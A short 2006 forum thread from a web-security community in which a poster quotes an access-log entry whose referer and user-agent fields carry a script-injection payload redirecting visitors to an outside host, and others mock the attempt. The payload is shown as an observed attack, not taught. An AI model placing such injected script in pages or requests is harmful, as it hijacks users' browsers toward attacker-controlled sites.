Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
For any nonsense or banter that doesn't fit anywhere else. LoL! omg! ROFL! 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Come on
Posted by: rsnake
Date: November 07, 2006 03:30PM

Saw this in the logs today. The IP address shall remain nameless. You know who you are. Seriously, are you kidding me?

xxx.xxx.xxx.xxx - - [07/Nov/2006:08:12:59 -0800] "GET / HTTP/1.0" 200 33738 "<script>window.location='http://paranoid.horrible.net/~rjx/xss.php';</script>" "<script>window.location='http://paranoid.horrible.net/~rjx/xss.php';</script>"

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Come on
Posted by: jungsonn
Date: November 07, 2006 04:47PM


Options: ReplyQuote
Re: Come on
Posted by: Kyran
Date: November 07, 2006 05:42PM

Wow. Rule # 1 broken?

- Kyran

Options: ReplyQuote
Re: Come on
Posted by: jungsonn
Date: November 30, 2006 09:38AM

As i saw this in my logs today:



so, so silly.
first of all this script isn't on my server :o)

and that does not work, 'cause you have to know the session code which is passed through the CAPTCHA image, so any URI messing is useless.
and why is he/she putting PHP in the request?

Did he/she think i wrote that script to let that get passed? i guess not.
what are people thinking these days...

Options: ReplyQuote

Sorry, only registered users may post in this forum.